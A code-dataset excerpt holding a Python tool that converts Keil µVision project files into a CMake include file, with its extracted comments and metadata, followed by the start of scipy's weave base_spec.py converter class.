def check_common(self) -> Set[Language]:
"""
Check which properties are common to all language configurations.
:return: Set of all used languages (languages with at least one property)
"""
all_props = (self.include_paths, self.defines, self.undefines, self.source_file_paths)
# Get all of the defined languages used
languages = {lang
for props in all_props
for prop in props
for lang in prop.languages}
for props in all_props:
for prop in props:
prop.common = (prop.languages == languages)
return languages
def __str__(self) -> str:
languages = sorted(self.check_common(), key=operator.attrgetter('value'))
ret_str = [
"# Made with CMake <> uVision project file synchronizer"
"# https://github.com/bojanpotocnik/cmake-uvision-syncer"
]
# Set of the build properties
prop_sets: List[Tuple[str, str, List[CMake.String], str]] = [
("definitions", "DEFINES", self.defines, "-D"),
("un-defines", "UNDEFINES", self.undefines, ""),
("include directories", "INCLUDE_DIRS", self.include_paths, ""),
("source files", "SOURCES", self.source_file_paths, ""),
]
# Set of the language configs per build property
sub_prop_sets: List[Tuple[str, str, Callable[[CMake.String], bool]]] = [
("Common", "COMMON", lambda prop: prop.common),
*((lang.value + " specific", lang.name,
lambda prop, lang_=lang: (not prop.common) and (lang_ in prop.languages))
for lang in languages)
]
def _add_section_files(comment: str, var_name: str, value_iterator: Iterable[CMake.String],
value_prefix: str = "") -> str:
s = (f"# {comment}\n"
f"set({var_name}")
value_str = ''
for value in value_iterator:
if value.comment is not None:
value_str += f"\n\t# {value.comment}"
value_str += f"\n\t{value_prefix}{value.value}"
if len(value_str) != 0:
return s + value_str + "\n)"
else:
return None
for section_comment, section_var_prefix, section_props, val_prefix in prop_sets:
ss_str = []
for prop_set_comment, var_suffix, filter_fun in sub_prop_sets:
section_files = _add_section_files(
comment=f"{prop_set_comment} {section_comment}",
var_name=f"{section_var_prefix}_{var_suffix}",
value_iterator=filter(filter_fun, section_props),
value_prefix=val_prefix
)
if section_files is not None:
ss_str.append(section_files)
ret_str.append("\n\n".join(ss_str))
other_files = _add_section_files(
comment="Other files",
var_name="OTHER_FILES",
value_iterator=self.other_file_paths
)
if other_files is not None:
ret_str.append(other_files)
return "\n\n\n".join(ret_str)
def main() -> None:
# region Parse arguments
arguments = docopt(__doc__)
project_path: str = arguments["<project>"] or "."
if not os.path.isfile(project_path):
with os.scandir(project_path) as dirs: # type: Iterator[DirEntry]
projects = [de.path for de in dirs if (de.is_file() and (os.path.splitext(de.name)[1] == ".uvprojx"))]
if not projects:
raise FileNotFoundError(f"Could not find any .uvprojx file in '{project_path}'")
elif len(projects) > 1:
# Choose the latest file by modification time.
project_path = max(projects, key=os.path.getmtime)
else:
project_path = projects[0]
project_path = os.path.realpath(project_path)
# endregion Parse arguments
print(f"Using µVision5 Project File '{project_path}'")
# Parse uVision project XML files
uvp = UVisionProject.new(project_path)
# Generate CMake file and populate it with information from uVision project
cmake = CMake()
# Add Assembler properties
cmake.add_include_paths(uvp.targets[0].build.asm.include_paths, Language.ASM)
cmake.add_defines(uvp.targets[0].build.asm.defines, Language.ASM)
cmake.add_undefines(uvp.targets[0].build.asm.undefines, Language.ASM)
# Add C properties
cmake.add_include_paths(uvp.targets[0].build.c.include_paths, Language.C)
cmake.add_defines(uvp.targets[0].build.c.defines, Language.C)
cmake.add_undefines(uvp.targets[0].build.c.undefines, Language.C)
# Add source and other files
for file, lang, comment in uvp.source_files():
cmake.add_source_files(file.path, lang, comment, file.include_in_build)
fp_proj_cmake = os.path.join(os.path.dirname(uvp.project_file_path),
os.path.splitext(os.path.basename(uvp.project_file_path))[0] + ".cmake")
with open(fp_proj_cmake, 'w') as f:
print(cmake, file=f)
print(f"Generated CMake file '{fp_proj_cmake}'")
if __name__ == "__main__":
main()
| """
Usage:
main.py [<project>]
Options:
<project> Path to the .uvprojx file (Keil® µVision5 Project File).
The .uvoptx file (Keil® µVision5 Project Options file) will
be located automatically as it shall be adjacent to the
.uvprojx file, having the same filename.
If this is a directory, .uvprojx is found automatically (if
multiple found then the latest changed is chosen).
If not provided then the current working directory is chosen
as a project directory.
"""
import enum
import operator
import os
import warnings
from collections import defaultdict
from dataclasses import dataclass
from os import DirEntry
from pathlib import Path
from typing import List, Optional, Union, Iterable, Collection, Set, Tuple, Callable, Dict, Iterator
from docopt import docopt
from lxml import etree
__author__ = "<NAME>"
UnknownInt = int
UnknownBool = bool
@enum.unique
class Language(enum.Enum):
ASM = "Assembler"
C = "C"
CPP = "C++"
@enum.unique
class FileType(enum.Enum):
C_SOURCE = 1
"""C Source file"""
ASM_SOURCE = 2
"""Assembly language file"""
OBJECT = 3
"""Object file"""
LIBRARY = 4
"""Library file"""
TEXT_DOCUMENT = 5
"""Text Document file"""
CUSTOM = 7
"""Custom file"""
CPP_SOURCE = 8
"""C++ Source file"""
IMAGE = 9
"""Image file"""
# region XML data structures for Project File
@dataclass
class Target:
@dataclass
class Toolset:
number: int
name: str
@dataclass
class Compiler:
cc: str
ac6: bool
@dataclass
class Options:
@dataclass
class Common:
device: str
vendor: str
pack_id: str
pack_url: str
cpu: str
device_id: int
register_file: str
@dataclass
class Properties:
use_cpp_compiler: bool
common: Common
properties: Properties
@dataclass
class Build:
@dataclass
class Misc:
@dataclass
class Memory:
@enum.unique
class Type(enum.Enum):
"""TODO: Real meaning unknown."""
TYPE0 = 0
TYPE1 = 1
name: str
type: Type
start: int
size: int
cpu_type: str
memories: List[Memory]
@dataclass
class C:
optimization: int
strict: bool
c99: bool
gnu: bool
misc: List[str]
defines: List[str]
undefines: List[str]
include_paths: List[str]
@dataclass
class Asm:
misc: List[str]
defines: List[str]
undefines: List[str]
include_paths: List[str]
@dataclass
class Linker:
text_address_range: int
data_address_range: int
misc: List[str]
misc: Misc
c: C
asm: Asm
ld: Linker
@dataclass
class File:
name: str
type: FileType
path: str
include_in_build: bool
"""Whether this file is included in the build or ignored."""
always_build: bool
"""Whether to always build this file."""
@dataclass
class Group:
name: str
files: List['Target.File']
name: str
toolset: Toolset
compiler: Compiler
options: Options
build: Build
groups: List[Group]
@dataclass
class RTE:
@dataclass
class TargetInfo:
@enum.unique
class VersionMatchMode(enum.Enum):
FIXED = "fixed"
name: str
version_match_mode: Optional[VersionMatchMode]
@dataclass
class Package:
name: str
url: str
vendor: str
version: str
target_infos: List['RTE.TargetInfo']
@dataclass
class Component:
class_: str
group: str
vendor: str
version: str
condition: str
package: 'RTE.Package'
target_infos: List['RTE.TargetInfo']
@dataclass
class File:
@enum.unique
class Attribute(enum.Enum):
CONFIG = "config"
@enum.unique
class Category(enum.Enum):
SOURCE = "source"
attr: Attribute
category: Category
condition: Optional[str]
name: str
version: str
instance: str
component: 'RTE.Component'
package: 'RTE.Package'
target_infos: List['RTE.TargetInfo']
packages: List[Package]
components: List[Component]
files: List[File]
# endregion XML data structures for Project File
# region XML data structures for Project Options file
@dataclass
class File:
group_number: int
"""Number of the :cls:`Group` this file belongs to."""
number: int
"""Number of the file (global across all groups)."""
type: FileType
"""File type as selected in the Options for File ... -> Properties dialog"""
expanded: bool
"""Whether the file is expanded (include file dependencies shown) in the Project Window file browser."""
include_in_build: bool
"""Whether this file is included in the build or ignored."""
always_build: bool
"""Whether to always build this file."""
tv_exp_opt_dlg: UnknownBool
dave2: UnknownBool
path: str
filename: str
rte_flag: bool
"""Whether this file is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only."""
shared: UnknownBool
_project_file: Target.File = None
"""Reference to the instance of this file from the Project File."""
@dataclass
class Group:
name: str
"""Group name as shown in the Project Window file browser."""
expanded: bool
"""Whether the group is expanded (files shown) in the Project Window file browser."""
tv_exp_opt_dlg: UnknownBool
cb_sel: UnknownBool
rte_flag: bool
"""Whether this group is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only."""
files: List[File]
"""List of files in this group."""
_project_group: Target.Group = None
"""Reference to the instance of this group from the Project File."""
# endregion XML data structures for Project Options file
# region XML parsing helper functions
def text(element: etree.ElementBase, name: str, is_attribute: bool = False, nullable: bool = False) -> Optional[str]:
if is_attribute:
if nullable:
return element.attrib.get(name)
else:
return element.attrib[name]
value = element.xpath(name)
if (not value) and nullable:
return None
if len(value) != 1:
raise ValueError(f"Only one '{name}' tag per tree is supported, {len(value)} found")
return value[0].text
def strict_bool(element: etree.ElementBase, name: str, nullable: bool = False, *,
false_value: str = "0", true_value: str = "1") -> Optional[bool]:
value = text(element, name, nullable=nullable)
if value == false_value:
return False
if value == true_value:
return True
if (value is None) and nullable:
return None
raise ValueError(f"'{value}' (of {name}) is not valid boolean value")
def strict_hex(element: etree.ElementBase, name: str) -> int:
value = text(element, name)
if not value.startswith("0x"):
raise ValueError(f"'{value}' (of {name}) is not valid hexadecimal value")
return int(value, 16)
# endregion XML parsing helper functions
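# Sketch of how these helpers behave (element names and values below are only
# examples, not taken from a real project): text() reads either a child tag
# or, with is_attribute=True, an XML attribute; strict_bool()/strict_hex()
# add validation on top of it.
#   text(package, "name", True)        -> value of the 'name' attribute
#   strict_bool(file, "tvExp")         -> True/False for "1"/"0"
#   strict_hex(memory, "StartAddress") -> integer parsed from e.g. "0x08000000"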
@dataclass
class UVisionProject:
project_file_path: str
project_options_path: str
# region Project File
targets: List[Target]
# endregion Project File
# region Project Options
groups: List[Group]
"""Groups of files, as shown in the Project Window file browser."""
# endregion Project Options
@classmethod
def new(cls, project_file_path: str) -> 'UVisionProject':
fp_base = os.path.splitext(project_file_path)[0]
project_file_path = fp_base + ".uvprojx"
project_options_path = fp_base + ".uvoptx"
with open(project_file_path) as f:
# noinspection PyProtectedMember
xproj: etree._Element = etree.parse(f).getroot()
with open(project_options_path) as f:
# noinspection PyProtectedMember
xopt: etree._Element = etree.parse(f).getroot()
# region Project File
if xproj.tag != "Project":
raise ValueError("Invalid uVision Project File XML file")
# noinspection PyCallByClass,SpellCheckingInspection
targets = [
Target(
name=text(target, "TargetName"),
toolset=Target.Toolset(
number=strict_hex(target, "ToolsetNumber"),
name=text(target, "ToolsetName")
),
compiler=Target.Compiler(
cc=text(target, "pCCUsed", nullable=True),
ac6=strict_bool(target, "uAC6")
),
options=next(
# There is always only one TargetOption element, but using a generator is a
# clean and effective way of creating an inline local variable.
Target.Options(
common=next(
Target.Options.Common(
device=text(tco, "Device"),
vendor=text(tco, "Vendor"),
pack_id=text(tco, "PackID"),
pack_url=text(tco, "PackURL"),
cpu=text(tco, "Cpu"),
device_id=text(tco, "DeviceId"),
register_file=text(tco, "RegisterFile")
) for tco in to.xpath("TargetCommonOption")
),
properties=next(
Target.Options.Properties(
use_cpp_compiler=strict_bool(tcp, "UseCPPCompiler"),
) for tcp in to.xpath("CommonProperty")
)
) for to in target.xpath("TargetOption")
),
build=next(
Target.Build(
misc=Target.Build.Misc(
cpu_type=text(to_taa, "ArmAdsMisc/AdsCpuType"),
memories=[
Target.Build.Misc.Memory(
name=memory.tag,
type=Target.Build.Misc.Memory.Type(int(text(memory, "Type"))),
start=strict_hex(memory, "StartAddress"),
size=strict_hex(memory, "Size")
) for memory in to_taa.xpath("ArmAdsMisc/OnChipMemories/*")
]
),
c=next(
Target.Build.C(
optimization=int(text(to_taa_c, "Optim")),
strict=strict_bool(to_taa_c, "Strict"),
c99=strict_bool(to_taa_c, "uC99"),
gnu=strict_bool(to_taa_c, "uGnu"),
misc=[
mc.strip() for mc in text(to_taa_c, "VariousControls/MiscControls").split(",")
],
defines=[
mc.strip() for mc in text(to_taa_c, "VariousControls/Define").split(" ")
],
undefines=[
mc.strip() for mc in (text(to_taa_c, "VariousControls/Undefine") or "").split(" ")
],
include_paths=[
mc.strip() for mc in text(to_taa_c, "VariousControls/IncludePath").split(";")
]
) for to_taa_c in to_taa.xpath("Cads")
),
asm=next(
Target.Build.Asm(
misc=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/MiscControls") or "").split(",")
],
defines=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/Define") or "").split(" ")
],
undefines=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/Undefine") or "").split(" ")
],
include_paths=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/IncludePath") or "").split(";")
]
) for to_taa_a in to_taa.xpath("Aads")
),
ld=next(
Target.Build.Linker(
text_address_range=strict_hex(to_taa_ld, "TextAddressRange"),
data_address_range=strict_hex(to_taa_ld, "DataAddressRange"),
misc=[
mc.strip() for mc in
text(to_taa_ld, "Misc").split(",") # TODO: Delimiter unknown
]
) for to_taa_ld in to_taa.xpath("LDads")
)
) for to_taa in target.xpath("TargetOption/TargetArmAds")
),
groups=[
Target.Group(
name=text(group, "GroupName"),
files=[
Target.File(
name=text(file, "FileName"),
type=FileType(int(text(file, "FileType"))),
path=text(file, "FilePath"),
include_in_build=strict_bool(file, "FileOption/CommonProperty/IncludeInBuild",
nullable=True),
always_build=strict_bool(file, "FileOption/CommonProperty/AlwaysBuild",
nullable=True, true_value="2")
) for file in group.xpath("Files/File")
]
) for group in target.xpath("Groups/Group")
]
) for target in xproj.xpath("Targets/Target")
]
# region RTE
# noinspection PyCallByClass,PyTypeChecker
rte = RTE(
packages=[
RTE.Package(
name=text(package, "name", True),
url=text(package, "url", True),
vendor=text(package, "vendor", True),
version=text(package, "version", True),
target_infos=[
RTE.TargetInfo(
name=text(ti, "name", True),
# Using generator and list only for local variable
version_match_mode=next(RTE.TargetInfo.VersionMatchMode(vmm) if vmm else None
for vmm in [text(ti, "versionMatchMode", True, True)])
) for ti in package.xpath("targetInfos/targetInfo")
]
) for package in xproj.xpath("RTE/packages/package")
],
components=[
RTE.Component(
class_=text(component, "Cclass", True),
group=text(component, "Cgroup", True),
vendor=text(component, "Cvendor", True),
version=text(component, "Cversion", True),
condition=text(component, "condition", True),
package=next(
# There is always only one package, but using a generator is a clean and
# effective way of creating an inline local variable.
# This new instance of package will be replaced below with reference to an actual matching
# instance of the package from rte.packages.
RTE.Package(
name=text(package, "name", True),
url=text(package, "url", True),
vendor=text(package, "vendor", True),
version=text(package, "version", True),
target_infos=None
) for package in component.xpath("package")
),
target_infos=[
RTE.TargetInfo(
name=text(ti, "name", True),
# TODO: Handle nullable
# RTE.TargetInfo.VersionMatchMode(text(ti, "versionMatchMode", True, True))
version_match_mode=None
) for ti in component.xpath("targetInfos/targetInfo")
]
) for component in xproj.xpath("RTE/components/component")
],
files=[
RTE.File(
attr=RTE.File.Attribute(text(file, "attr", True)),
category=RTE.File.Category(text(file, "category", True)),
condition=text(file, "condition", True, True),
name=text(file, "name", True),
version=text(file, "version", True),
instance=text(file, "instance"),
component=next(
RTE.Component(
class_=text(component, "Cclass", True),
group=text(component, "Cgroup", True),
vendor=text(component, "Cvendor", True),
version=text(component, "Cversion", True),
condition=text(component, "condition", True),
package=None,
target_infos=None
) for component in file.xpath("component")
),
package=None, # TODO
target_infos=None, # TODO
) for file in xproj.xpath("RTE/files/file")
]
)
# TODO: Connect actual references of the rte.packages and rte.packages.target_infos
for component in rte.components:
cp = component.package
component.package = None
cp.target_infos = None
for package in rte.packages:
# Temporarily remove target_infos to enable usage of the equality operator.
pti = package.target_infos
package.target_infos = None
if cp == package:
component.package = package
package.target_infos = pti
break
package.target_infos = pti
# endregion RTE
# endregion Project File
# region Project Options
if xopt.tag != "ProjectOpt":
raise ValueError("Invalid uVision Project Options XML file")
groups: List[Group] = []
for group in xopt.xpath("Group"):
group_name = text(group, "GroupName")
# Find this group in the Project File
xproj_group = next(g for g in next(iter(targets)).groups if (g.name == group_name))
# Find all files in this group and also in the Project File
files: List[File] = []
for file in group.xpath("File"):
file_type = FileType(int(text(file, "FileType")))
file_name = text(file, "FilenameWithoutPath")
xproj_file = next(f for f in xproj_group.files if (f.type == file_type and f.name == file_name))
files.append(File(
group_number=int(text(file, "GroupNumber")),
number=int(text(file, "FileNumber")),
type=file_type,
expanded=strict_bool(file, "tvExp"),
include_in_build=xproj_file.include_in_build,
always_build=xproj_file.always_build,
tv_exp_opt_dlg=strict_bool(file, "tvExpOptDlg"),
dave2=strict_bool(file, "bDave2"),
path=text(file, "PathWithFileName"),
filename=file_name,
rte_flag=strict_bool(file, "RteFlg"),
shared=strict_bool(file, "bShared")
))
groups.append(Group(
name=group_name,
expanded=strict_bool(group, "tvExp"),
tv_exp_opt_dlg=strict_bool(group, "tvExpOptDlg"),
cb_sel=strict_bool(group, "cbSel"),
rte_flag=strict_bool(group, "RteFlg"),
files=files
))
# There is no more *currently relevant* data in the Project Options file.
# endregion Project Options
# Add RTE files to the file groups to actually match the Project Window file browser.
for file in rte.files:
# Find the group to which this file belongs (there shall be one and only one).
group = None
group_number = 1
for group_number, group in enumerate(groups, 1):
if group.files and group.files[0].group_number != group_number:
warnings.warn(f"Inconsistent group number {group.files[0].group_number} for group {group.name}"
f" (expected to be {group_number})")
if group.rte_flag and group.name.strip(":") == file.component.class_:
break
filename = os.path.basename(file.instance)
# Detect file type (this information is not provided for RTE files)
if filename.endswith(".s"):
file_type = FileType.ASM_SOURCE
elif filename.endswith(".c"):
file_type = FileType.C_SOURCE
elif filename.endswith(".cpp"):
file_type = FileType.CPP_SOURCE
elif filename.endswith(".h"):
file_type = FileType.TEXT_DOCUMENT
else:
warnings.warn(f"Unknown RTE file type '{file.instance}': {file}")
continue
group.files.append(File(
group_number=group_number,
number=max(f.number for g in groups for f in g.files) + 1,
type=file_type,
expanded=False,
include_in_build=True, # TODO: This information is available for RTE files
always_build=None,
tv_exp_opt_dlg=False, # TODO
dave2=False, # TODO
path=file.instance,
filename=os.path.basename(file.instance),
rte_flag=True,
shared=False
))
return cls(
project_file_path=project_file_path,
project_options_path=project_options_path,
targets=targets,
groups=groups
)
def source_files(self) -> Iterator[Tuple[File, Optional[Language], Optional[str]]]:
"""
Get all files grouped by file type, with group names as comments.
"""
# Add source files
for group in self.groups:
comment = group.name
if group.rte_flag:
# RTE groups start with double colon (::).
comment = "RTE" + comment
# Group files by type and add one comment for every file type, as each type goes into a separate section.
files: Dict[Union[Language, None], List[File]] = defaultdict(list)
for file in group.files:
if file.type == FileType.ASM_SOURCE:
lang = Language.ASM
elif file.type == FileType.C_SOURCE:
lang = Language.C
elif file.type == FileType.TEXT_DOCUMENT:
lang = None
else:
warnings.warn(f"Unsupported file type: {file.type} for {file}")
continue
files[lang].append(file)
for lang, files in files.items():
comment_per_type = comment
for file in files:
yield file, lang, comment_per_type
comment_per_type = None
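# Sketch of how source_files() is typically consumed (the variable name uvp is
# hypothetical): each yielded tuple is (File, Language or None, group comment
# or None), where the comment is only attached to the first file of each
# (group, language) pair.
#   for f, lang, comment in uvp.source_files():
#       print(comment or "", lang, f.path)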
class CMake:
@dataclass
class String:
value: str
"""The actual string value."""
languages: Set[Language]
"""Set of all build configs in which this value is present."""
common: bool = False
comment: Optional[str] = None
"""Comment which will be added to the line before"""
def __eq__(self, o: 'CMake.String') -> bool:
if isinstance(o, type(self)):
return self.value == o.value
elif isinstance(o, str):
return self.value == o
return NotImplemented
def __init__(self) -> None:
self.include_paths: List[CMake.String] = []
self.defines: List[CMake.String] = []
self.undefines: List[CMake.String] = []
self.source_file_paths: List[CMake.String] = []
self.other_file_paths: List[CMake.String] = []
@classmethod
def _get(cls, lst: List[String], obj: str) -> String:
"""Get existing object from the list or append a new one to the end."""
try:
# noinspection PyTypeChecker
itm = lst[lst.index(obj)]
except ValueError:
# noinspection PyCallByClass
itm = cls.String(obj, set())
lst.append(itm)
return itm
@classmethod
def _add_values(cls, where: List[String], values: Union[str, Iterable[str]],
languages: Union[Language, Collection[Language], None], comment: Optional[str] = None) -> None:
if isinstance(languages, Language):
languages = [languages]
for val in values:
obj = cls._get(where, val)
if comment is not None:
# Add comment to the first value only
obj.comment = comment
comment = None
if languages:
obj.languages.update(languages)
@staticmethod
def _clean_paths(paths: Union[str, Iterable[str]]) -> List[str]:
if isinstance(paths, (str, Path)):
paths = [paths]
return [Path(p).as_posix() for p in map(os.path.normpath, paths)]
def add_include_paths(self, paths: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.include_paths, self._clean_paths(paths), languages, comment)
def add_defines(self, defines: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.defines, defines, languages, comment)
def add_undefines(self, undefines: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.undefines, undefines, languages, comment)
def add_source_files(self, paths: Union[None, str, Iterable[str]],
languages: Union[Language, Collection[Language], None],
comment: str = None, include_in_build: bool = True) -> None:
paths = self._clean_paths(paths)
# If file is not included in the build, comment it
if include_in_build is False:
paths = ["# " + path for path in paths]
self._add_values(self.source_file_paths if languages else self.other_file_paths, paths, languages, comment)
def add_other_files(self, paths: Union[str, Iterable[str]], comment: str = None) -> None:
self.add_source_files(paths, None, comment)
def check_common(self) -> Set[Language]:
"""
Check which properties are common to all language configurations.
:return: Set of all used languages (languages with at least one property)
"""
all_props = (self.include_paths, self.defines, self.undefines, self.source_file_paths)
# Get all of the defined languages used
languages = {lang
for props in all_props
for prop in props
for lang in prop.languages}
for props in all_props:
for prop in props:
prop.common = (prop.languages == languages)
return languages
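# Illustrative behaviour (values invented): if "USE_HAL_DRIVER" was added for
# both Language.C and Language.ASM and those are the only languages seen,
# check_common() marks that define as common, so __str__() emits it once under
# DEFINES_COMMON instead of repeating it in each language-specific section.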
def __str__(self) -> str:
languages = sorted(self.check_common(), key=operator.attrgetter('value'))
ret_str = [
"# Made with CMake <> uVision project file synchronizer"
"# https://github.com/bojanpotocnik/cmake-uvision-syncer"
]
# Set of the build properties
prop_sets: List[Tuple[str, str, List[CMake.String], str]] = [
("definitions", "DEFINES", self.defines, "-D"),
("un-defines", "UNDEFINES", self.undefines, ""),
("include directories", "INCLUDE_DIRS", self.include_paths, ""),
("source files", "SOURCES", self.source_file_paths, ""),
]
# Set of the language configs per build property
sub_prop_sets: List[Tuple[str, str, Callable[[CMake.String], bool]]] = [
("Common", "COMMON", lambda prop: prop.common),
*((lang.value + " specific", lang.name,
lambda prop, lang_=lang: (not prop.common) and (lang_ in prop.languages))
for lang in languages)
]
def _add_section_files(comment: str, var_name: str, value_iterator: Iterable[CMake.String],
value_prefix: str = "") -> str:
s = (f"# {comment}\n"
f"set({var_name}")
value_str = ''
for value in value_iterator:
if value.comment is not None:
value_str += f"\n\t# {value.comment}"
value_str += f"\n\t{value_prefix}{value.value}"
if len(value_str) != 0:
return s + value_str + "\n)"
else:
return None
for section_comment, section_var_prefix, section_props, val_prefix in prop_sets:
ss_str = []
for prop_set_comment, var_suffix, filter_fun in sub_prop_sets:
section_files = _add_section_files(
comment=f"{prop_set_comment} {section_comment}",
var_name=f"{section_var_prefix}_{var_suffix}",
value_iterator=filter(filter_fun, section_props),
value_prefix=val_prefix
)
if section_files is not None:
ss_str.append(section_files)
ret_str.append("\n\n".join(ss_str))
other_files = _add_section_files(
comment="Other files",
var_name="OTHER_FILES",
value_iterator=self.other_file_paths
)
if other_files is not None:
ret_str.append(other_files)
return "\n\n\n".join(ret_str)
def main() -> None:
# region Parse arguments
arguments = docopt(__doc__)
project_path: str = arguments["<project>"] or "."
if not os.path.isfile(project_path):
with os.scandir(project_path) as dirs: # type: Iterator[DirEntry]
projects = [de.path for de in dirs if (de.is_file() and (os.path.splitext(de.name)[1] == ".uvprojx"))]
if not projects:
raise FileNotFoundError(f"Could not find any .uvprojx file in '{project_path}'")
elif len(projects) > 1:
# Choose the latest file by modification time.
project_path = max(projects, key=os.path.getmtime)
else:
project_path = projects[0]
project_path = os.path.realpath(project_path)
# endregion Parse arguments
print(f"Using µVision5 Project File '{project_path}'")
# Parse uVision project XML files
uvp = UVisionProject.new(project_path)
# Generate CMake file and populate it with information from uVision project
cmake = CMake()
# Add Assembler properties
cmake.add_include_paths(uvp.targets[0].build.asm.include_paths, Language.ASM)
cmake.add_defines(uvp.targets[0].build.asm.defines, Language.ASM)
cmake.add_undefines(uvp.targets[0].build.asm.undefines, Language.ASM)
# Add C properties
cmake.add_include_paths(uvp.targets[0].build.c.include_paths, Language.C)
cmake.add_defines(uvp.targets[0].build.c.defines, Language.C)
cmake.add_undefines(uvp.targets[0].build.c.undefines, Language.C)
# Add source and other files
for file, lang, comment in uvp.source_files():
cmake.add_source_files(file.path, lang, comment, file.include_in_build)
fp_proj_cmake = os.path.join(os.path.dirname(uvp.project_file_path),
os.path.splitext(os.path.basename(uvp.project_file_path))[0] + ".cmake")
with open(fp_proj_cmake, 'w') as f:
print(cmake, file=f)
print(f"Generated CMake file '{fp_proj_cmake}'")
if __name__ == "__main__":
main()
| en | 0.786815 | Usage: main.py [<project>] Options: <project> Path to the .uvprojx file (Keil® µVision5 Project File). The .uvoptx file (Keil® µVision5 Project Options file) will be located automatically as it shall be adjacent to the .uvprojx file, having the same filename. If this is a directory, .uvprojx is found automatically (if multiple found then the latest changed is chosen). If not provided then the current working directory is chosen as a project directory. C Source file Assembly language file Object file Library file Text Document file Custom file C++ Source file Image file # region XML data structures for Project File TODO: Real meaning unknown. Whether this file is included in the build or ignored. Whether to always build this file. # endregion XML data structures for Project File # region XML data structures for Project Options file Number of the :cls:`Group` this file belongs to. Number of the file (global across all groups). File type as selected in the Options for File ... -> Properties dialog Whether the file is expanded (include file dependencies shown) in the Project Window file browser. Whether this file is included in the build or ignored. Whether to always build this file. Whether this file is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only. Reference to the instance of this file from the Project File. Group name as shown in the Project Window file browser. Whether the group is expanded (files shown) in the Project Window file browser. Whether this group is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only. List of files in this group. Reference to the instance of this group from the Project File. # endregion XML data structures for Project Options file # region XML parsing helper functions # endregion XML parsing helper functions # region Project File # endregion Project File # region Project Options Groups of files, as shown in the Project Window file browser. # endregion Project Options # noinspection PyProtectedMember # noinspection PyProtectedMember # region Project File # noinspection PyCallByClass,SpellCheckingInspection # There is always only one package, but using generator is clean and # effective way of creating an inline local variable. # TODO: Delimiter unknown # region RTE # noinspection PyCallByClass,PyTypeChecker # Using generator and list only for local variable # There is always only one package, but using generator is clean and # effective way of creating an inline local variable. # This new instance of package will be replaced below with reference to an actual matching # instance of the package from rte.packages. # TODO: Handle nullable # RTE.TargetInfo.VersionMatchMode(text(ti, "versionMatchMode", True, True)) # TODO # TODO # TODO: Connect actual references of the rte.packages and rte.packages.target_infos # Temporally remove target_infos to enable usage of equality operator. # endregion RTE # endregion Project File # region Project Options # Find this group in the Project File # Find all files in this group and also in the Project File # There is no more *currently relevant* data in the Project Options file. # endregion Project Options # Add RTE files to the file groups to actually match the Project Window file browser. # Find the group to which this file belongs to (there shall be one and only one). 
# Detect file type (this information is not provided for RTE files) # TODO: This information is available for RTE files # TODO # TODO Get all files grouped by the file type with group names as a comments. # Add source files # RTE groups start with double colon (::). # Group files by type and add one comment for every file type as they are in the separate sections. The actual string value. Set of all build configs in which this value is present. Comment which will be added to the line before Get existing object from the list or append a new one to the end. # noinspection PyTypeChecker # noinspection PyCallByClass # Add comment to the first value only # If file is not included in the build, comment it Check which properties are common to all language configurations. :return: Set of all used languages (languages with at least one property) # Get all of the defined languages used # Set of the build properties # Set of the language configs per build property # {value.comment}" # region Parse arguments # type: Iterator[DirEntry] # Choose the latest file by modification time. # endregion Parse arguments # Parse uVision project XML files # Generate CMake file and populate it with information from uVision project # Add Assembler properties # Add C properties # Add source and other files | 2.892172 | 3 |
scipy/weave/base_spec.py | lesserwhirls/scipy-cwt | 8 | 8555 | <filename>scipy/weave/base_spec.py
class base_converter(object):
"""
Properties:
headers -- list of strings that name the header files needed by this
object.
include_dirs -- list of directories where the header files can be found.
libraries -- list of libraries needed to link to when compiling
extension.
library_dirs -- list of directories to search for libraries.
support_code -- list of strings. Each string is a subroutine needed
by the type. Functions that are used in the conversion
between Python and C++ files are examples of these.
Methods:
type_match(value) returns 1 if this class is used to represent type
specification for value.
type_spec(name, value) returns a new object (of this class) that is
used to produce C++ code for value.
declaration_code() returns C++ code fragment for type declaration and
conversion of python object to C++ object.
cleanup_code() returns C++ code fragment for cleaning up after the
variable after main C++ code fragment has executed.
"""
_build_information = []
compiler = ''
def set_compiler(self,compiler):
self.compiler = compiler
def type_match(self,value):
raise NotImplementedError("You must override method in derived class")
def build_information(self):
return self._build_information
def type_spec(self,name,value):
pass
def declaration_code(self,templatize = 0):
return ""
def local_dict_code(self):
return ""
def cleanup_code(self):
return ""
def retrieve_py_variable(self,inline=0):
# this needs a little coordination in name choices with the
# ext_inline_function class.
if inline:
vn = 'get_variable("%s",raw_locals,raw_globals)' % self.name
else:
vn = 'py_' + self.name
return vn
def py_reference(self):
return "&py_" + self.name
def py_pointer(self):
return "*py_" + self.name
def py_variable(self):
return "py_" + self.name
def reference(self):
return "&" + self.name
def pointer(self):
return "*" + self.name
def init_flag(self):
return self.name + "_used"
def variable(self):
return self.name
def variable_as_string(self):
return '"' + self.name + '"'
import UserList
import base_info
class arg_spec_list(UserList.UserList):
def build_information(self):
all_info = base_info.info_list()
for i in self:
all_info.extend(i.build_information())
return all_info
def py_references(self):
return map(lambda x: x.py_reference(),self)
def py_pointers(self):
return map(lambda x: x.py_pointer(),self)
def py_variables(self):
return map(lambda x: x.py_variable(),self)
def references(self):
return map(lambda x: x.reference(),self)
def pointers(self):
return map(lambda x: x.pointer(),self)
def variables(self):
return map(lambda x: x.variable(),self)
def init_flags(self):
return map(lambda x: x.init_flag(),self)
def variable_as_strings(self):
return map(lambda x: x.variable_as_string(),self)
| <filename>scipy/weave/base_spec.py
class base_converter(object):
"""
Properties:
headers -- list of strings that name the header files needed by this
object.
include_dirs -- list of directories where the header files can be found.
libraries -- list of libraries needed to link to when compiling
extension.
library_dirs -- list of directories to search for libraries.
support_code -- list of strings. Each string is a subroutine needed
by the type. Functions that are used in the conversion
between Python and C++ files are examples of these.
Methods:
type_match(value) returns 1 if this class is used to represent type
specification for value.
